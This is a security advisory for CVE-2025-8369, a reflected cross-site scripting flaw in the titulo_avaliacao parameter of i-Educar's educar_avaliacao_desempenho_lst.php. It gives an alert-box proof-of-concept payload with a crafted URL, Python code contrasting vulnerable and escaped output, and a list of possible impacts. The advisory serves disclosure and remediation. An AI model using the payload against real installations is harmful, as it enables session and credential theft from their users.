CVE-2025-8369

Cross-Site Scripting (XSS) Reflected

CVE-2025-8369: Cross-Site Scripting (XSS) Reflected in endpoint educar_avaliacao_desempenho_lst.php parameter titulo_avaliacao

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-8369

Summary

A reflected Cross-Site Scripting (XSS) vulnerability was identified in the educar_avaliacao_desempenho_lst.php endpoint of the i-Educar application. The titulo_avaliacao parameter is reflected into the response page, which allows an attacker to inject arbitrary script through it.

Details

Vulnerable Endpoint: educar_avaliacao_desempenho_lst.php

Parameter: titulo_avaliacao

PoC

Payload:

Encoded

  %22%3E%3Cscript%3Ealert%28%27XSS-PoC%27%29%3C%2Fscript%3E

Decoded

  "><script>alert('XSS-PoC')</script>

URL

  /intranet/educar_avaliacao_desempenho_lst.php?titulo_avaliacao=%22%3E%3Cscript%3Ealert%28%27XSS-PoC%27%29%3C%2Fscript%3E

When a user accesses this crafted URL, the script is executed immediately in the browser, confirming the vulnerability.
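To make the attribute-context breakout and its fix concrete, here is an added Python model of the reflection (not i-Educar's own code, which this page does not show): the vulnerable renderer interpolates the raw titulo_avaliacao value into an input's value attribute, while the hardened one applies HTML attribute encoding, which is the remediation a maintainer would apply. The HTML skeleton and the host in the URL are assumptions.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed request: the advisory's PoC path and payload on a hypothetical host.
POC_URL = ("http://example.invalid/intranet/educar_avaliacao_desempenho_lst.php"
           "?titulo_avaliacao=%22%3E%3Cscript%3Ealert%28%27XSS-PoC%27%29%3C%2Fscript%3E")

# Assumed page skeleton: the listing's filter form echoes the submitted value back.
TEMPLATE = '<input type="text" name="titulo_avaliacao" value="{value}">'


def titulo_from_url(url: str) -> str:
    """Return the percent-decoded titulo_avaliacao value, as PHP's $_GET would see it."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get("titulo_avaliacao", [""])[0]


def render_vulnerable(titulo: str) -> str:
    """Reflects the parameter verbatim. The leading '">' closes the attribute and
    the tag, so the remainder of the payload is parsed as live markup (the bug)."""
    return TEMPLATE.format(value=titulo)


def render_hardened(titulo: str) -> str:
    """Attribute-context output encoding: quote=True turns " into &quot; and
    < > & into entities, so the value can never terminate the attribute."""
    return TEMPLATE.format(value=html.escape(titulo, quote=True))


def script_breaks_out(rendered: str) -> bool:
    """Demo-only check: does a raw <script> tag survive into the rendered HTML?"""
    return "<script>" in rendered


if __name__ == "__main__":
    t = titulo_from_url(POC_URL)
    print("decoded parameter:", t)
    print("vulnerable:", render_vulnerable(t))
    print("hardened:  ", render_hardened(t))
```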

Impact

  • Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.
  • Downloading malware: Attackers can trick users into downloading and installing malware on their computers.
  • Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.
  • Stealing credentials: Attackers can steal a user's credentials.
  • Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.
  • Defacing websites: Attackers can deface a website by altering its content.
  • Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.
  • Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.

Reference

https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8369.md

Finder

Marcelo Queiroz

By: CVE-Hunters
